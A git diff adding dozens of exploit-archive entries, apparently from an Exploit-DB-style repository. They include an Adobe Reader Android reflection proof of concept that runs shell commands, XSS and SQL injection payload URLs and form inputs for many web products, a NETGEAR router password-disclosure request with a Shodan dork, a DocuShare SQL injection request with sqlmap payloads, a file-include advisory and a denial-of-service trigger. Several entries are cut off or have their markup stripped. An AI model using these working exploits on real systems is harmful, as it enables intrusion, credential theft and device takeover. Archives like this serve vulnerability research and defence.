ARJavaScriptDoc(), +"_doc"); + this.mWebView.addJavascriptInterface(new +ARJavaScriptEScriptString(this.mContext), "_escriptString"); + this.mWebView.addJavascriptInterface(new ARJavaScriptEvent(), +"_event"); + this.mWebView.addJavascriptInterface(new ARJavaScriptField(), +"_field"); + this.mWebView.setWebViewClient(new ARJavaScript.1(this)); +this.mWebView.loadUrl("file:///android_asset/javascript/index.html"); + } + +An attacker can create a specially crafted PDF file containing +Javascript that runs when the target user views (or interacts with) +this PDF file. Using any of the Javascript objects listed above +provides the attacker access to the public Reflection APIs inherited +from Object. These APIs can be abused to run arbitrary Java code. + +------------------------------------------------------------------------ +Proof of concept +------------------------------------------------------------------------ +The following proof of concept [5] will create a text file in the app +sandbox. + +function execute(bridge, cmd) { + return bridge.getClass().forName('java.lang.Runtime') + .getMethod('getRuntime',null).invoke(null,null).exec(cmd); +} + +if(window._app) { + try { + var path = '/data/data/com.adobe.reader/mobilereader.poc.txt'; + execute(window._app, ['/system/bin/sh','-c','echo \"Lorem +ipsum\" > ' ++ path]); + window._app.alert(path + ' created', 3); + } catch(e) { + window._app.alert(e, 0); + } +} +------------------------------------------------------------------------ +References +------------------------------------------------------------------------ +[1] +http://www.securify.nl/advisory/SFY20140401/adobe_reader_for_android_exposes_insecure_javascript_interfaces.html +[2] https://play.google.com/store/apps/details?id=com.adobe.reader +[3] +http://developer.android.com/reference/android/webkit/JavascriptInterface.html +[4] +http://www.adobe.com/devnet-docs/acrobatetk/tools/Mobile/js.html#supported-javascript-apis +[5] http://www.securify.nl/advisory/SFY20140401/mobilereader.poc.pdf \ No newline at end of file diff --git a/platforms/asp/webapps/32833.txt b/platforms/asp/webapps/32833.txt new file mode 100755 index 000000000..4d4ca6799 --- /dev/null +++ b/platforms/asp/webapps/32833.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/33957/info + +Blogsa is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Blogsa 1.0 Beta 3 is vulnerable; other versions may also be affected. + +http://www.example.com/Widgets.aspx?w=Search&p=do&searchText= \ No newline at end of file diff --git a/platforms/asp/webapps/32874.txt b/platforms/asp/webapps/32874.txt new file mode 100755 index 000000000..94968465f --- /dev/null +++ b/platforms/asp/webapps/32874.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/34227/info + +BlogEngine.NET is prone to a cross-site scripting vulnerability. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials. + +BlogEngine.NET 1.4 is vulnerable; other versions may also be affected. + +http://www.example.com/blog/search.aspx?q="> \ No newline at end of file diff --git a/platforms/asp/webapps/32882.txt b/platforms/asp/webapps/32882.txt new file mode 100755 index 000000000..9c3b4e8b1 --- /dev/null +++ b/platforms/asp/webapps/32882.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/34341/info + +SAP Business Objects Crystal Reports is prone to a cross-site scripting vulnerability. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials. + +NOTE: This issue may be related to the one described in BID 12107 (Business Objects Crystal Enterprise Report File Cross-Site Scripting Vulnerability). We will update or retire this BID when more information emerges. + +https://www.example.com/some/path/viewreport.asp?url=viewrpt.cwr?ID=7777"%0d%0awindow.alert%20"fsck_cissp^^INIT=actx:connect \ No newline at end of file diff --git a/platforms/asp/webapps/32888.txt b/platforms/asp/webapps/32888.txt new file mode 100755 index 000000000..d73c885dc --- /dev/null +++ b/platforms/asp/webapps/32888.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/34349/info + +Asbru Web Content Management is prone to multiple SQL-injection vulnerabilities and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Asbru Web Content Management 6.5 and 6.6.9 are vulnerable; other versions may also be affected. + +http://www.example.com/page.asp?id=1 +http://www.example.com/page.asp?id=1 AND 1=2 +http://www.example.com/page.asp?id=1 AND 1=1 +http://www.example.com/webadmin/login.asp?url="> + diff --git a/platforms/asp/webapps/32898.txt b/platforms/asp/webapps/32898.txt new file mode 100755 index 000000000..5eaf3ebfc --- /dev/null +++ b/platforms/asp/webapps/32898.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/34463/info + +Absolute Form Processor XE is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Absolute Form Processor XE 1.5 is vulnerable; other versions may also be affected. + +The following example input is available: + +username: ' or '1=1 \ No newline at end of file diff --git a/platforms/asp/webapps/32903.txt b/platforms/asp/webapps/32903.txt new file mode 100755 index 000000000..46ac05275 --- /dev/null +++ b/platforms/asp/webapps/32903.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/34491/info + +People-Trak is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +The following example data is available: + +username: ' or 1=(Select top 1 WAM_UserID from WebAppMgrs)-- \ No newline at end of file diff --git a/platforms/cgi/webapps/32870.txt b/platforms/cgi/webapps/32870.txt new file mode 100755 index 000000000..a89cf7145 --- /dev/null +++ b/platforms/cgi/webapps/32870.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/34159/info + +AWStats is prone to a path-disclosure vulnerability. + +Exploiting this issue can allow an attacker to access sensitive data that may be used to launch further attacks against a vulnerable computer. + +The following are vulnerable: + +AWStats 6.5 (build 1.857) and prior +WebGUI Runtime Environment 0.8.x and prior + +http://www.example.com/awstats/awstats.pl?config=HACKdestailleur.fr \ No newline at end of file diff --git a/platforms/cgi/webapps/32907.txt b/platforms/cgi/webapps/32907.txt new file mode 100755 index 000000000..5e3b0660f --- /dev/null +++ b/platforms/cgi/webapps/32907.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/34507/info + +Banshee DAAP Extension is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials. + +DAAP Extension for Banshee 1.4.2 is vulnerable; other versions may also be affected. + +The following example URI is available: + +http://www.example.com:8089/[xss-here] \ No newline at end of file diff --git a/platforms/hardware/remote/32878.txt b/platforms/hardware/remote/32878.txt new file mode 100755 index 000000000..cf7a00069 --- /dev/null +++ b/platforms/hardware/remote/32878.txt @@ -0,0 +1,26 @@ +source: http://www.securityfocus.com/bid/34307/info + +Cisco ASA is prone to a cross-site scripting vulnerability. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials. + +Cisco ASA software versions 8.0.4(2B) and prior running on ASA 5500 Series Adaptive Security Appliances are vulnerable. + +POST /+webvpn+/index.html HTTP/1.1 +Host: "'> New bookmark .. and enter javascript:mimic_button('goto: 9096..') in the address field. + +2nd Method : +The web console tool (CTRL + SHIFT + K), in which you can interpret javascript expressions in real time using the command line provided by the Web Console. diff --git a/platforms/hardware/webapps/32883.txt b/platforms/hardware/webapps/32883.txt new file mode 100755 index 000000000..6cf1d21fd --- /dev/null +++ b/platforms/hardware/webapps/32883.txt @@ -0,0 +1,105 @@ +Title: Multiple vulnerabilities in NETGEAR N600 WIRELESS DUAL BAND WNDR3400 +==================================================================================== +Notification Date: 4/14/2014 +Affected Vendor: NETGEAR N600 WIRELESS DUAL BAND WNDR3400 +Firmware Version: Firmware Version 1.0.0.38 AND BELOW (ALL versions affected) +Issue Types: password Disclosure File Uploading with AuthPPOPE settings Change +Discovered by: Santhosh Kumar twitter: @security_b0x +Issue status: No Patch >From the Vendors. +grettings: @Anami2111 (anamika singh) -- creator of wihawk + + + +==================================================================================== +Summary: +======== +While i was lurking around the Netgear firmware today i came across various tweaking and others i was able to find a password disclosure,File uploading vulnerably which could compromise the entire router.as of now no patch from the vendor. + +Password Disclosure: +==================== +url: server/unauth.cgi?id=393087602 +Generating with the 401 unauthorised error +poc: +Host: server:8080 + User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Referer: http://server:8080/ + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + Content-Length: 0

Router Password Recovered

+ + + + + + + + + + + + + + + +\ + +poc2: + +server:8080/passwordrecovered.cgi?id=1738955828 + + + + + + + + + + + + + + + + + +============================================================================================================================== + +Ppope account reset: + +Netgear runs a utility called "netgear genie" which does not have proper authentication on reaching "genie_pppoe.htm " + +which allows to reset the ppoe username which any basic authentication. + +http://server/genie_pppoe.htm + +============================================================================================================================== + +File Upload (router reset): + +like the same one above the "http://server/genie_restore.htm" + +the config file can be uploaded which leading to reseting the control to attackers username and password. + +*.cfg file. + + +============================================================================================================================== +SHODAN DORK: +wndr3400: 10198 for wndr3400 + + + + + +****************************************************************************************************************************** + + + + + + + \ No newline at end of file diff --git a/platforms/hardware/webapps/32886.txt b/platforms/hardware/webapps/32886.txt new file mode 100755 index 000000000..26aabfcf3 --- /dev/null +++ b/platforms/hardware/webapps/32886.txt @@ -0,0 +1,127 @@ +The following request is vulnerable to a SQL injection in the last URI segment: + +GET /docushare/dsweb/ResultBackgroundJobMultiple/1 HTTP/1.1 +Host: 172.31.16.194:8080 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://172.31.16.194:8080/docushare/dsweb/DeleteConfirmation/1/Collection-14/Services +Cookie: JSESSIONID=AB82A86859D9C65475DDE5E47216F1A0.tomcat1; AmberUser=64.980A91BBF9D661CB800C2CE5FCCE924AEF4D51CF0280B319873BC31AF0705F0F21.1svt4r2doj13hhu1dc7kf +Connection: keep-alive + + +Response (goodies): + +
+

System Error

+
+
+
+
You have successfully recovered the admin password.
Router Admin Usernameadmin
Router Admin Passwordpassword
You have successfully recovered the admin password.
Router Admin Usernameadmin
Router Admin Password0514
You can now log in to the router using username "admin" and this recovered password.
+ + +
Error Code: 1501
SQL error.
+ + + +
+ + + + + + +--------------------------------------- + +quick sqlmap run: + +bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5 --risk=3 -o --dbms=postgres + + sqlmap/1.0-dev-e8c1c90 - automatic SQL injection and database takeover tool + http://sqlmap.org + +[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program + +[*] starting at 09:28:49 + +[09:28:49] [INFO] parsing HTTP request from '/tmp/req.req' +custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] +[09:28:50] [INFO] testing connection to the target URL +[09:28:51] [INFO] testing NULL connection to the target URL +[09:28:51] [INFO] testing if the target URL is stable. This can take a couple of seconds +[09:28:52] [INFO] target URL is stable +[09:28:52] [INFO] testing if URI parameter '#1*' is dynamic +[09:28:52] [INFO] confirming that URI parameter '#1*' is dynamic +[09:28:52] [WARNING] URI parameter '#1*' does not appear dynamic +[09:28:52] [INFO] testing for SQL injection on URI parameter '#1*' +[09:28:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' +[09:28:52] [WARNING] reflective value(s) found and filtering out +[09:28:53] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable +[09:28:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' +[09:28:53] [INFO] URI parameter '#1*' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable +[09:28:53] [INFO] testing 'PostgreSQL inline queries' +[09:28:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries' +[09:28:53] [WARNING] time-based comparison requires larger statistical model, please wait........ +[09:29:04] [INFO] URI parameter '#1*' seems to be 'PostgreSQL > 8.1 stacked queries' injectable +[09:29:04] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' +[09:29:14] [INFO] URI parameter '#1*' seems to be 'PostgreSQL > 8.1 AND time-based blind' injectable +[09:29:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' +[09:29:14] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found +[09:29:14] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test +[09:29:14] [INFO] target URL appears to have 10 columns in query +injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] +[09:29:31] [INFO] testing 'Generic UNION query (49) - 22 to 40 columns' +[09:29:33] [INFO] testing 'Generic UNION query (49) - 42 to 60 columns' +[09:29:34] [INFO] testing 'Generic UNION query (49) - 62 to 80 columns' +[09:29:36] [INFO] testing 'Generic UNION query (49) - 82 to 100 columns' +URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] +sqlmap identified the following injection points with a total of 155 HTTP(s) requests: +--- +Place: URI +Parameter: #1* + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: http://172.31.16.194:8080/docushare/dsweb/ResultBackgroundJobMultiple/1 AND 6164=6164 + + Type: error-based + Title: PostgreSQL AND error-based - WHERE or HAVING clause + Payload: http://172.31.16.194:8080/docushare/dsweb/ResultBackgroundJobMultiple/1 AND 7298=CAST((CHR(113)||CHR(113)||CHR(108)||CHR(115)||CHR(113))||(SELECT (CASE WHEN (7298=7298) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(109)||CHR(121)||CHR(113)) AS NUMERIC) + + Type: stacked queries + Title: PostgreSQL > 8.1 stacked queries + Payload: http://172.31.16.194:8080/docushare/dsweb/ResultBackgroundJobMultiple/1; SELECT PG_SLEEP(5)-- + + Type: AND/OR time-based blind + Title: PostgreSQL > 8.1 AND time-based blind + Payload: http://172.31.16.194:8080/docushare/dsweb/ResultBackgroundJobMultiple/1 AND 3994=(SELECT 3994 FROM PG_SLEEP(5)) +--- +[09:30:04] [INFO] the back-end DBMS is PostgreSQL +back-end DBMS: PostgreSQL +[09:30:04] [INFO] fetched data logged to text files under '/home/bperry/tools/sqlmap/output/172.31.16.194' + +[*] shutting down at 09:30:04 + +bperry@ubuntu:~/tools/sqlmap$ diff --git a/platforms/ios/webapps/32866.txt b/platforms/ios/webapps/32866.txt new file mode 100755 index 000000000..190f76cd9 --- /dev/null +++ b/platforms/ios/webapps/32866.txt @@ -0,0 +1,269 @@ +Document Title: +=============== +PDF Album v1.7 iOS - File Include Web Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1255 + + +Release Date: +============= +2014-04-11 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1255 + + +Common Vulnerability Scoring System: +==================================== +7.3 + + +Product & Service Introduction: +=============================== +Here is a creative way to record an idea, a page in a book or newspapers, what you learned, even a travel memory. You can get content from camera, +image or text editor, then pick them up into a pdf file and compose them as you wish. You can order the pages in project, then save the project +and open it again when you want to add or change it. You can get pdfs via WIFI or read them in this app. + +(Copy of the Homepage: https://itunes.apple.com/ch/app/pdf-album/id590232990 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official PDF Album v1.7 iOS mobile application. + + +Vulnerability Disclosure Timeline: +================================== +2014-04-11: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Lintao Zhao +Product: PDF Album - iOS Mobile Application 1.7 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A local file include web vulnerability has been discovered in the official PDF Album v1.7 iOS mobile web-application. The local file include +web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise +the mobile web-application. + +The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with malicious +`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs +in the `pdf album index item` list context. The attacker can inject the local file include request by usage of the `wifi interface` or by a local +privileged application user account via `folder sync`. + +Attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute different +local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to inject is POST. The security +risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 6.8(+)|(-)6.9. + +Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with low user auth. +Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise. + +Request Method(s): + [+] [POST] - Remote + [+] [SYNC] - Local + +Vulnerable Module(s): + [+] Browse File > Upload + +Vulnerable Parameter(s): + [+] filename.*.pdf + +Affected Module(s): + [+] PDF Album - Index Item Listing (http://localhost:8808/) + + +Proof of Concept (PoC): +======================= +The local file include web vulnerability can be exploited by local attackers with low privileged user account without required user interaction. +For security demonstration or to reproduce the local file include vulnerability follow the provided information and steps below to continue. + +PoC: Exploit Code + + + + + +
NameDelete
+>"<./[LOCAL FILE INCLUDE VULNERABILITY VIA PDF ALBUMNAME!">.pdf + +
+%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME!]%3E.pdf + + + + +PoC: Vulnerable Source + + + + +PoC Link: +http://localhost:8808/files/%3E%22%3C[FILE INCLUDE VULNERABILITY!]%3E.pdf + + +--- PoC Session Logs [POST] --- +Injection via Wifi UI > Upload (iChm File Management) +14:44:34.743[170ms][total 170ms] Status: 302[Found] +POST http://192.168.2.104:8808/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html] + Request Header: + Host[192.168.2.104:8808] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://192.168.2.104:8808/] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------1145570518587 +Content-Disposition: form-data; name="newfile"; filename="%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY!].png" +Content-Type: image/png + +Note: A local injection by usage of the app album name value is also possible via regular sync! + + +--- PoC Session Logs [GET] --- +Execution PDF Album (iChm File Management) +14:43:20.010[836ms][total 1106ms] Status: 200[OK] +GET http://192.168.2.104:8808/ Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[2773] Mime Type[application/x-unknown-content-type] + Request Header: + Host[192.168.2.104:8808] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Connection[keep-alive] + Cache-Control[max-age=0] + Response Header: + Accept-Ranges[bytes] + Content-Length[2773] + Date[Do., 10 Apr. 2014 12:54:15 GMT] + + +14:43:20.874[48ms][total 48ms] Status: 200[OK] +GET http://192.168.2.104:8808/jquery.js Load Flags[VALIDATE_ALWAYS ] Gr??e des Inhalts[55774] Mime Type[application/x-unknown-content-type] + Request Header: + Host[192.168.2.104:8808] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0] + Accept[*/*] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://192.168.2.104:8808/] + Connection[keep-alive] + Cache-Control[max-age=0] + Response Header: + Accept-Ranges[bytes] + Content-Length[55774] + Date[Do., 10 Apr. 2014 12:54:15 GMT] + + +14:43:21.062[41ms][total 41ms] Status: 200[OK] +GET http://192.168.2.104:8808/%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY!].*; Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[0] Mime Type[application/x-unknown-content-type] + Request Header: + Host[192.168.2.104:8808] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://192.168.2.104:8808/] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + Content-Length[0] + Date[Do., 10 Apr. 2014 12:54:15 GMT] + + + +Reference(s): +http://localhost:8808/files/ +http://localhost:8808/ + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure parse and restriction of the vulnerable filename value in the upload POST method request. +Encode and filter also the output name value for item list to prevent application-side executions and malicious injected context via POST method. + + +Security Risk: +============== +The security risk of the local file include web vulnerability in the mobile application is estimated as high. + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- +Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business +profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some +states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation +may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases +or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and +other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), +modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright ? 2014 | Vulnerability Laboratory [Evolution Security] + + + + + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/java/dos/32860.txt b/platforms/java/dos/32860.txt new file mode 100755 index 000000000..3fa5122d7 --- /dev/null +++ b/platforms/java/dos/32860.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/34150/info + +Sun Java System Calendar Server is prone to a denial-of-service vulnerability because it fails to handle certain duplicate URI requests. + +An attacker can exploit this issue to crash the Calendar Server, resulting in a denial-of-service condition. + +NOTE: Versions prior to Sun Java System Calendar Server 6.3 are not vulnerable. + +The following example data is available: + +https://www.example.com:3443/?tzid=crash \ No newline at end of file diff --git a/platforms/java/webapps/32818.txt b/platforms/java/webapps/32818.txt new file mode 100755 index 000000000..f0e7bd38b --- /dev/null +++ b/platforms/java/webapps/32818.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/33912/info + +JOnAS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +JOnAS 4.10.3 is vulnerable; other versions may also be affected. + +http://www.example.com:9000/jonasAdmin/ListMBeanDetails.do?select=jonas%3Aj2eeType%3DEJBModule%2Cj2eeType%3DEJBModule \ No newline at end of file diff --git a/platforms/java/webapps/32821.html b/platforms/java/webapps/32821.html new file mode 100755 index 000000000..73f179456 --- /dev/null +++ b/platforms/java/webapps/32821.html @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/33924/info + +APC PowerChute Network Shutdown is prone to an HTTP-response-splitting vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user, steal cookie-based authentication credentials, and influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust. + +1 XSS: GET /security/applet?referrer=>"'> 2. Response Splitting Vulnerability found in script contexthelp. vulnerable parameter - "page" Example ******* GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0 response: HTTP/1.0 302 Moved temporarily Content-Length: 0 Date: ??~B, 25 ?~A?? 2008 10:47:42 GMT Server: Acme.Serve/v1.7 of 13nov96 Connection: close Expires: 0 Cache-Control: no-cache Content-type: text/html Location: help/english/Foobar? DSECRG_HEADER:testvalue Content-type: text/html \ No newline at end of file diff --git a/platforms/java/webapps/32858.txt b/platforms/java/webapps/32858.txt new file mode 100755 index 000000000..49aadec73 --- /dev/null +++ b/platforms/java/webapps/32858.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/34140/info + +Sun Java System Messenger Express is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Sun Java System Messenger Express 6.3-0.15 is vulnerable; other versions may also be affected. + +http://example.com/?user=admin&error= "> \ No newline at end of file diff --git a/platforms/java/webapps/32862.txt b/platforms/java/webapps/32862.txt new file mode 100755 index 000000000..42c3ecbb0 --- /dev/null +++ b/platforms/java/webapps/32862.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/34153/info + +Sun Java System Calendar Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +https://www.example.com:3443//command.shtml?view=overview&id=HK8CjQOkmbY&date=20081217T200734%27;alert('xss');//Z&caliad=someid@test.com&security=1 \ No newline at end of file diff --git a/platforms/java/webapps/32863.txt b/platforms/java/webapps/32863.txt new file mode 100755 index 000000000..cbacf1399 --- /dev/null +++ b/platforms/java/webapps/32863.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/34154/info + +Sun Java System Communications Express is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +https://www.example.com/uwc/abs/search.xml?bookid=e11e46531a8a0&j_encoding=UTF-8&uiaction=quickaddcontact&entryid=&valueseparator=%3B&prefix=abperson_&stopalreadyselected=1&isselchanged=0&idstoadd=&selectedbookid=&type=abperson%2Cgroup&wcfg_groupview=&wcfg_searchmode=&stopsearch=1&expandgroup=&expandselectedgroup=&expandonmissing=&nextview=&bookid=e11e46531a8a0&actionbookid=e11e46531a8a0&searchid=7&filter=entry%2Fdisplayname%3D*&firstentry=0&sortby=%2Bentry%2Fdisplayname&curbookid=e11e46531a8a0&searchelem=0&searchby=contains&searchstring=Search+for&searchbookid=e11e46531a8a0&abperson_givenName=aa&abperson_sn=aa&abperson_piEmail1=a%40a.com&abperson_piEmail1Type=work&abperson_piPhone1=11&abperson_piPhone1Type=work&quickaddprefix=abperson_&abperson_displayName=%3Cscript%3Ealert%28%27xss2%27%29%3C%2Fscript%3E%2C+%3Cscript%3Ealert%28%27xss1%27%29%3C%2Fscript%3E&abperson_entrytype=abperson&abperson_memberOfPIBook=e11e46531a8a0 diff --git a/platforms/java/webapps/32864.txt b/platforms/java/webapps/32864.txt new file mode 100755 index 000000000..7bfae404c --- /dev/null +++ b/platforms/java/webapps/32864.txt @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/34155/info + +Sun Java System Communications Express is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +This issue is tracked by Sun Alert ID 258068. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +The following are vulnerable: + +Sun Java System Communications Express 6.3 for Sun Java Communications Suite 5 and 6 +Sun Java System Communications Express 6 2005Q4 (6.2) + +http://www.example.com/uwc/base/UWCMain?anon=true&calid=test@test.com&caltype=temporaryCalids&date=20081223T143836Z&category=All&viewctx=day&temporaryCalendars=test@test.com%27;alert(%27hello%27);a=%27 diff --git a/platforms/java/webapps/32897.txt b/platforms/java/webapps/32897.txt new file mode 100755 index 000000000..6f796a214 --- /dev/null +++ b/platforms/java/webapps/32897.txt @@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/34454/info + +Cisco Subscriber Edge Services Manager is prone to a cross-site 